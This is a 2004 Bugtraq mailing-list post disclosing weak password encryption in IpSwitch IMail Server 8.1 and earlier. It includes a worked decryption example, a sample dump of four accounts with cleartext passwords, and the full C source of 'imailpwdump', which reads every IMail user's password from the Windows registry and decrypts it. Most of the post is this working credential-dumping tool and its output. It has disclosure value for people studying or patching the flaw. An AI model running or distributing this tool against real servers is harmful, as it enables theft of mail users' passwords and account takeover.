Home page logo
/

bugtraq logo Bugtraq mailing list archives

IpSwitch IMail Server <= ver 8.1 User Password Decryption
From: Adik <netninja () hotmail kg>
Date: Mon, 16 Aug 2004 23:18:53 +0600 (KGST)

Hi fellaz,

IpSwitch IMail Server version up to 8.1 uses weak encryption algorithm to 
encrypt its user passwords. Have a look at attached proof of concept tool, 
which will decrypt user password from local machine instantly.

---
G:\xploits\imail_decrypt>
G:\xploits\imail_decrypt>imailpwdump -d

        --= [ IpSwitch IMail Server User Password Decrypter ver 1.1] =--

                 (c) 2004 by Adik ( netmaniac [at] hotmail.KG )



 DOMAIN:         [ 192.168.65.129 ]

 DOMAIN:         [ win2k ]
------------------------------------------------------------------------
 FullName:       aselka
 Email:          aselka () win2k
 Username:       aselka
 Password:       p3ace
------------------------------------------------------------------------
 FullName:       brazilia
 Email:          brazilia () win2k
 Username:       brazilia
 Password:       mysupersecretpassword
------------------------------------------------------------------------
 FullName:       networkadmin
 Email:          networkadmin () win2k
 Username:       networkadmin
 Password:       c00l
------------------------------------------------------------------------
 FullName:       System Administrator
 Email:          root () win2k
 Username:       root
 Password:       password

         Total:  4 Accounts

 Total:  1 Domains, 4 Accounts

---

ciao,

Adik

/*************************************************************************************************
*       IpSwitch IMail Server <= ver 8.1 User Password Decryption
*       
*       by Adik < netmaniac[at]hotmail.KG > 
*       
*       IpSwitch IMail Server uses weak encryption algorithm to encrypt its user passwords. It uses
*       polyalphabetic Vegenere cipher to encrypt its user passwords. This encryption scheme is
*       relatively easy to break. In order to decrypt user password we need a key. IMail uses username
*       as a key to encrypt its user passwords. The server stores user passwords in the registry under the key 
*       "HKEY_LOCAL_MACHINE\SOFTWARE\IpSwitch\IMail\Domains\<domainname>\Users\<username>\Password".
*       Before decrypting password convert all upper case characters in the username to lower case
*       characters. We use username as a key to decrypt our password.
*       In order to get our plain text password, we do as follows:
*       1) Subtract hex code of first password hash character by the hex code of first username character.
*          The resulting hex code will be our first decrypted password character.
*       2) Repeat above step for the rest of the chars.
*       
*       Look below, everythin is dead simple ;)
*       eg:
*
*       USERNAME:               netmaniac       
*       PASSWORDHASH:   D0CEE7D5CCD3D4C7D2E0CAEAD2D3
*       --------------------------------------------
*               
*       D0 CE E7 D5 CC D3 D4 C7 D2 E0 CA EA D2 D3       <- password hash
* -     6E 65 74 6D 61 6E 69 61 63 6E 65 74 6D 61       <- hex codes of username
*       n  e  t  m  a  n  i  a  c  n  e  t  m  a        <- username is a key
*       -----------------------------------------
*       62 69 73 68 6B 65 6B 66 6F 72 65 76 65 72       <- hex codes of decrypted password
*       b  i  s  h  k  e  k  f  o  r  e  v  e  r        <- actual decrypted password
*
*
*       pwdhash_hex_code                username_hex_code               decrypted_password
*       ------------------------------------------------------------------
*                       D0                      -               6E (n)                  =       62 (b)
*                       CE                      -               65 (e)                  =       69 (i)
*                       E7                      -               74 (t)                  =       73 (s)
*                       D5                      -               6D (m)                  =       68 (h)
*                       CC                      -               61 (a)                  =       6B (k)
*                       D3                      -               6E (n)                  =       65 (e)
*                       D4                      -               69 (i)                  =       6B (k)
*                       C7                      -               61 (a)                  =       66 (f)
*                       D2                      -               63 (c)                  =       6F (o)
*                       E0                      -               6E (n)                  =       72 (r)
*                       CA                      -               65 (e)                  =       65 (e)
*                       EA                      -               74 (t)                  =       76 (v)
*                       D2                      -               6D (m)                  =       65 (e)
*                       D3                      -               61 (a)                  =       72 (r)
*       ------------------------------------------------------------------
*
*       I've included a lil proggie to dump all the usernames/passwords from local machine's registry.
*       Have fun!
*       //Send bug reports to netmaniac[at]hotmail.KG
*
*       Greets to: my man wintie from .au, Chintan Trivedi :), jin yean ;), Morphique
*
*       [16/August/2004] Bishkek
**************************************************************************************************/


//#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <windows.h>
#define snprintf        _snprintf
#pragma comment(lib,"advapi32")
#define ALLOWED_USERNAME_CHARS  "A-Z,a-z,0-9,-,_,."
#define MAX_NUM 1024 //500
#define DOMAINZ "Software\\IpSwitch\\IMail\\Domains"
#define VER     "1.1"
#define MAXSIZE 100

int total_accs=0;
int total_domainz=0,total_domain_accs=0;
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
void greetz()
{
        printf( "\n\t--= [ IpSwitch IMail Server User Password Decrypter ver %s] =--\n\n"
                        "\t\t (c) 2004 by Adik ( netmaniac [at] hotmail.KG )\n\n\n",VER);
}
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
void usage()
{
        printf( "------------------------------------------------------------------------\n");
        printf( " Imailpwdump [-d] -- Dumps IMail Server user/pwds from local registry\n\n"
                        " Imailpwdump [username] [passwordhash] -- User/PwdHash to decrypt\n\n"
                        " eg: Imailpwdump netmaniac D0CEE7D5CCD3D4C7D2E0CAEAD2D3\n");
        printf( "------------------------------------------------------------------------\n");
                        
}
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
void str2hex(char *hexstring, char *outbuff)
{       
        unsigned long tmp=0;
        char tmpchr[5]="";      
        memset(outbuff,0,strlen(outbuff));
        if(strlen(hexstring) % 2)
        {
                printf(" Incorrect password hash!\n");
                exit(1);
        }
        if(strlen(hexstring)>MAXSIZE)
        {
                printf(" Password hash is too long! \n");
                exit(1);
        }
        for(unsigned int i=0, c=0; i<strlen(hexstring); i+=2, c++)
        {
                memcpy(tmpchr,hexstring+i,2);
                tmp = strtoul(tmpchr,NULL,16);          
                outbuff[c] = (char)tmp;         
        }
}
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
void str2smallcase(char *input)
{
        if(strlen(input)>MAXSIZE)
        {
                printf(" Username too long! \n");
                return;
        }
        for(unsigned int i=0;i<strlen(input);i++)
        {
                if(isalnum(input[i]) || input[i] == '-' || input[i]=='_' || input[i]=='.')              
                        input[i] = tolower(input[i]);                   
                else
                {
                        printf(" Bad characters in username!\n Allowed characters: %s\n",ALLOWED_USERNAME_CHARS);
                        return;
                }               
        }
}
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
void populate(char *input,unsigned int size)
{
        char tmp[MAX_NUM]="";
        unsigned int strl = strlen(input);
        strcpy(tmp,input);
        //netmaniacnetmaniacnetman
        for(unsigned int i=strlen(input),c=0;i<size;i++,c++)
        {       
                if(c==strl)
                        c=0;
                input[i] = tmp[c];
        }
        input[i]='\0';
}
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
void imail_decrypt(char *username, char *pwdhash,char *outbuff)
{
        //adik 123456
        //adikbek 123
        if(strlen(pwdhash) <= strlen(username) )
        {
                memset(outbuff,0,sizeof(outbuff));
                for(unsigned int i=0;i<strlen(pwdhash);i++)     
                        outbuff[i] = (pwdhash[i]&0xff) - (username[i]&0xff);                    
                outbuff[i]='\0';
        }       
}
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
void get_usr_pwds(char *subkey,char *usr)
{
        long res;
        HKEY hPwdKey;
        char username[MAXSIZE]="";
        char passwdhash[MAXSIZE*2]="", passwd[MAXSIZE]="",clearpasswd[MAXSIZE]="";
        char fullname[MAXSIZE]="";
        char email[MAXSIZE]="";
        DWORD lType;
        DWORD passwdhashsz=sizeof(passwdhash)-1,fullnamesz=MAXSIZE-1,emailsz=MAXSIZE-1;

                res = RegOpenKeyEx(HKEY_LOCAL_MACHINE,subkey,0,KEY_ALL_ACCESS,&hPwdKey);
                if(res!=ERROR_SUCCESS)
                {
                        printf(" Error opening key %s! Error #:%d\n",subkey,res);
                        exit(1);        
                        //return;
                }
        
                if(RegQueryValueEx(hPwdKey,"Password",0,&lType,(LPBYTE)passwdhash,&passwdhashsz)!= ERROR_SUCCESS)
                {
                        RegCloseKey(hPwdKey);
                        return;
                }
                if(RegQueryValueEx(hPwdKey,"FullName",0,&lType,(LPBYTE)fullname,&fullnamesz)!= ERROR_SUCCESS)
                {
                        RegCloseKey(hPwdKey);
                        return;
                }
                if(RegQueryValueEx(hPwdKey,"MailAddr",0,&lType,(LPBYTE)email,&emailsz)!=ERROR_SUCCESS)
                {
                        RegCloseKey(hPwdKey);
                        return;
                }
                

                str2smallcase(usr);
                strncpy(username,usr,sizeof(username)-1);
                str2hex(passwdhash,passwd);
                // adik 1234567
                // adik 12
                if(strlen(passwd)>strlen(username))
                        populate(username,strlen(passwd));
                imail_decrypt(username,passwd,clearpasswd);

                printf( "------------------------------------------------------------------------\n"
                                " FullName:\t %s\n"
                                " Email:\t\t %s\n"
                                " Username:\t %s\n"
                                " Password:\t %s\n",
                                fullname,email,usr,clearpasswd);
        total_accs++;
        RegCloseKey(hPwdKey);
}
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
void dump_registry_pwds()
{
        HKEY hKey,hUserKey;
        DWORD domRes=0,usrRes=0, domlen=0,userlen=0,domIndex=0,userIndex=0;
        FILETIME ftime;
        char domain[150]="";
        char user[150]="";
        char tmpbuff[MAX_NUM]="";
        char usrtmpbuff[MAX_NUM]="";
        domRes = RegOpenKeyEx(HKEY_LOCAL_MACHINE,DOMAINZ,0,KEY_ALL_ACCESS,&hKey);
        if(domRes!=ERROR_SUCCESS)
        {
                printf(" Error opening key '%s'!\n IMail not installed?? Error #:%d\n",DOMAINZ,domRes);
                exit(1);
        }
        do
        {
                domlen=sizeof(domain)-1;
                domRes=RegEnumKeyEx(hKey,domIndex,domain,&domlen,NULL,NULL,NULL,&ftime);
                if(domRes!=ERROR_NO_MORE_ITEMS)
                {
                        printf("\n DOMAIN:\t [ %s ]\n",domain);
                        userIndex=0;
                        total_accs=0;
                        snprintf(tmpbuff,sizeof(tmpbuff)-1,"%s\\%s\\Users",DOMAINZ,domain);
                        usrRes = RegOpenKeyEx(HKEY_LOCAL_MACHINE,tmpbuff,0,KEY_ALL_ACCESS,&hUserKey);
                        if(usrRes==ERROR_SUCCESS)
                        {               
                                //adik
                                do
                                {
                                        userlen=sizeof(user)-1;
                                        usrRes=RegEnumKeyEx(hUserKey,userIndex,user,&userlen,NULL,NULL,NULL,&ftime);
                                        if(usrRes!=ERROR_NO_MORE_ITEMS)
                                        {                                               
                                                
snprintf(usrtmpbuff,sizeof(usrtmpbuff)-1,"%s\\%s\\Users\\%s",DOMAINZ,domain,user);                                      
        
                                                get_usr_pwds(usrtmpbuff,user);          
                                        }
                                        userIndex++;                                    
                                }
                                while(usrRes!=ERROR_NO_MORE_ITEMS);
                                RegCloseKey(hUserKey);
                                printf("\n\t Total:\t %d Accounts\n",total_accs);
                                total_domain_accs += total_accs;
                                total_domainz++;
                        }                       
                        domIndex++;                     
                }
        }
        while(domRes != ERROR_NO_MORE_ITEMS);
        RegCloseKey(hKey);
        //total_domains += dom
        printf("\n Total:\t %d Domains, %d Accounts\n",total_domainz,total_domain_accs);

}
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
void decrypt_usr_pass(char *usr,char *passwd)
{
        char username[MAX_NUM]="";
        char passwordhash[MAX_NUM]="";
        char outputbuff[250]="";

        str2smallcase(usr);
        strncpy(username,usr,sizeof(username)-1);
        str2hex(passwd,passwordhash);
        printf("------------------------------------------------------------------------\n");
        printf( " Username:\t\t %s\n"
                        " Passwordhash:\t\t %s\n",usr,passwd);
        if(strlen(passwordhash)>strlen(username))
                populate(username,strlen(passwordhash));

        imail_decrypt(username,passwordhash,outputbuff);
        printf(" Decrypted passwd:\t %s\n",outputbuff);
        printf("------------------------------------------------------------------------\n");
}
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
void main(int argc, char *argv[])
{
        greetz();       
        
        if(argc ==2 && strncmp(argv[1],"-d",2)==0 )
        {
                //dump passwd from registry
                dump_registry_pwds();
        }
        else if(argc == 3 && strncmp(argv[1],"-d",2)!=0)
        {
                //decrypt username passwd
                decrypt_usr_pass(argv[1],argv[2]);
        }
        else
        {
                usage();
                return;
        }

        // ThE eNd

}
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault